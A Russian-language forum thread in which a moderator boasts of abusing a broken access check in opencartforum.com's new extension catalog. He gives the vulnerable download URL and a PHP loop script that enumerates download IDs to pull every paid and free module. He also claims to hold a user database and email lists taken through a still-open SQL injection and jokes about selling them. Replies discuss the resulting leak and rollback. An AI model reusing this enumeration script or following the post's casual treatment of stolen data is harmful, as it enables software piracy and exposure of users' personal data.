За последнюю неделю опубликовано 29 новых материалов.
Инструкция новичку Путеводитель по форуму Прокси для Telegram Показать подсказки , это бомба!

Как за один вечер прое*ать все дополнения которые разработчики продают через твой форум

  • Поучаствуй (в качестве покупателя) в любых пяти совместных покупках (кроме завершённых и "Моментальных") и получи группу "Новичок" навсегда -> ссылка на раздел
  • Получай до 480 рублей за каждого приглашенного пользователя!
    представляем Вам очередное расширение партнерской программы, подробности описаны тут -> ссылка
  • 90% материалов доступно к скачиванию после простой регистрации!
    Если же ты хочешь скачивать материалы без требования оставлять отзывы то получи группу "Новичок", 10 способов повышения описаны тут -> ссылка
  • К сожалению количество битых ссылок растет и мы уже не можем их оперативно восстанавливать поэтому просим помощи у каждого нашего пользователя.
    С сегодняшнего дня, за каждую восстановленную ссылку мы заплатим Вам.
    Подробнее тут -> ссылка
  • Перенесем твои заслуги с другого ресурса!
    Мы понимаем как сложно прокачивать аккаунты на форумах, вроде раскачал аккаунт, а тут появляется ресурс в 100 раз круче но тоже с системой прокачки и снова качать аккаунт...
    Предлагаем вам перенести Ваши заслуги на другом подобном ресурсе к нам.
    Подробности описаны тут -> ссылка
  • Вы можете получать по 2.5% с каждой покупки и продажи на маркете! Подробности в теме Партнёрская программа

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.116
10.231
140
Питер
Тихий вечер четверга. Ничего не предвещало, как говорится.
Решил посмотреть как идут дела у opencartforum.com с его новым каталогом, где обещано api, хотел внедрить в панель. Но что-то пошло не так...
Снимок.PNG
0_758ca_ca38cd1c_orig.jpg

Сириусли? Просто взять и положить болт на пользователей и разработчиков надо уметь.
Такое ощущение что был поставлен свежий опенкарт вот только что и "Какалог" (я не опечатался) создаётся в прямом эфире...
Чтож вы так долго делали то и переносили сроки.
Я не буду описывать количество мелких багов и дыр нового "каталога". Тут подойдёт картинка
oAsRQcqpD2E.jpg

Невольно вспомнилось.
Снимок.PNG

Ну чтож. Дотестировали, выпустили....

Опишу по моему мнению самый адский трешак.
Первое что бросилось в глаза это наличие интересной кнопочки у одного из модулей.
Снимок.PNG
"Как же так?" - подумал я - "Я ведь даже не залогинен..."
Скачав архив я увидел настоящий платный модуль, да и ещё свеженькой версии. Мдээ.
Идем дальше, у остальных дополнений кнопок нет, но "каталог" позволил же нам скачать платный модуль, значит ему глубоко посрать на что мы имеем права, а на что нет. Лишь бы была ссылка.

Ссылка была вида:
Код:
https://extensions.myopencart.com/index.php?route=product/download/download&download_id=274621&action_product_id=324
&action_product_id=324 нам не интересно, а вот download_id=274621 уже другое дело.

На коленке пишем простенький скрипт:
PHP:
<?php
$i= 0;
while($i<100000000){
$url = "https://extensions.myopencart.com/index.php?route=product/download/download&download_id=".$i."&action_product_id=3363";
$file = fopen(md5($url), 'a');
if($file){
fwrite($file, file_get_contents( $url ));
fclose($file);
}
$i++;
sleep(2);
}
?>
И запускаем его где нибудь на локалке =D
И смотрим как наполняется папка архивами с модулями.
Качаются все, платные, бесплатные...

Жесть короче, этот баг не единственный, к сожалению.

Если меня читает администрация opencartforum.com - то у меня к вам предложение:
Продам вам в одни руки некий sql файл с какими-то данными или некий txt файл с какими-то почтами извлеченными из некоего sql файла, или же zip архив с кучей каких-то других архивов.

Не комплектом, с ценой за позицию. Дорого. :sarcastic_hand:
Это шутка. Эти артефакты навсегда останутся в недрах моего жесткого диска для напоминания мне что перед запуском чего либо нужно тестировать и они никогда не увидят свет (не пишите в личку! Ни по дружбе, ни по братски. Никак.).

Спасибо за внимание, Всем добра)

P.S. Кусочек чего-то)
Снимок.PNG

P.S.S. Как честный человек я подождал пока баг будет пофикшен перед тем как постить (в общей сложности, конкретно этот баг жил очень долго, SQL иньекция жива до сих пор), поэтому способ описанный здесь, более не работает.
 
P.S.S.S. Я далеко не самый умный поэтому я не несу ответственности если кто-то сделал так же и выложит дампы в сеть.
 

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.116
10.231
140
Питер
Черный день в истории opencartforum.com:(
Собственно сами виноваты. Каталог был запущен в неподобающем виде. Очень жаль разработчиков, модули которых "благодаря" opencartforum.com расползутся по всему интернету...
 

Гость
Ех, а я ждал релиза окстора 21 октября, и теперь все в 504 Gateway Time-out
 

Гость
А кто мешал поставить пароль на какалог и маленько потестировать его,пригласив все тех же разработчиков?
 

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.116
10.231
140
Питер
В том то и дело что никто. Это главная загадка)
Наверно торопились уложиться в сроки. Я бы помог диноксу, если бы он попросил, хотя бы api написал для его каталога) Но видимо жест в виде гарантий не слива того что утекло ничего не стоит, а вообще это всё печально) Я не берусь что-то утверждать так как мне не приходилось рулить таким большим сообществом, но я считаю что нужно было нанять кого нибудь или самим проапгрейдить тот каталог что был. Добавить в него то что просили люди, это было бы очень круто. Ссылки бы не потерялись и так далее, но указывать другим людям что делать моветон) А пока я гну свою линию тут со своей панелью) И меня радует что у меня есть уже пара пользователей кто ею пользуется, спасибо Вам) Динокс, пиши в личку или на почту, помогу бесплатно. Мне не нужны Ваши деньги.
 
Финита ля комедия. Слили все модули, базу и делаем как было. 5 баллов.... Мда....
2222.PNG
 

Гость
Все. УПАЛИ. "извините нас мы про@бали все ваши продажи", и что бы дальше нас не имели школьники --- "Мы перешли на старую версию".
 

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.116
10.231
140
Питер
Все. УПАЛИ. "извините нас мы про@бали все ваши продажи", и что бы дальше нас не имели школьники --- "Мы перешли на старую версию".
Про школьников поподробнее пожалуйста.

В итоге что имеем:
  • Провальный запуск "Нового каталога".
  • Утечка всех персональных данных пользователей, покупателей etc... (читай sql дамп).
  • Утечка всех дополнений, платных и бесплатных etc...
  • Вернулись к тому что было.
  • Волнения в сообществе.
  • Потеря времени клиентов купивших модули в этот спорный период.
  • etc...
4893.jpg
 

Гость
Про школьников по подробнее пожалуйста.
Я не в коем случаи не имел тебя ввиду, я имел ввиду, то что ты описал этот метод у себя на форуме, и все начали тестить как он работает. А они особо ниче не потеряли, так как в паблике этого все равно не будет)
 

mizaider

DevsAid Team
Команда форума
Модератор
18 Май 2016
71.116
10.231
140
Питер
А они особо ниче не потеряли, так как в паблике этого все равно не будет)
Ну я бы огорчился если бы знал что у кого-то есть дамп моего форума, пусть даже с гарантией не слива в паблик. И тем более огорчились бы мои пользователи)
:spam:
 

Гость
Правильно, ТЫ бы огорчился, а ОНИ (Да им насрать, главное бабло рубить)
 

Alexey

Участник
Разработчик
23 Май 2016
15
8
110
26
Всплыл небольшой фрагмент, о том как динокс делал каталог.

auto-administrator.gif
 

Привет!

Мы группа людей которые решили помочь другим в решении их проблем, а так же пользователям с поиском самых свежих и качественных инфопродуктов. За 4 с небольшим месяца мы создали этот форум на который заходят ежедневно тысячи человек и посещаемость постоянно растёт. Мы создали панель лицензирования для защиты PHP скриптов от воровства и SEO панель для мониторинга наших сайтов и выбора верной стратегии их развития. Мы надеемся что то что мы создали пригодится Вам и возможно Вы поможете нам развиваться и совершенствоваться вместе с Вами.

Статистика форума

Темы
384.694
Сообщения
428.050
Пользователи
59.382
Новый пользователь
qwer33392

Приложения форума для iOS и Android


У ркн там нет власти ;)
Приватные разговоры
Помощь Пользователи
    Вы не присоединились ни к одной комнате.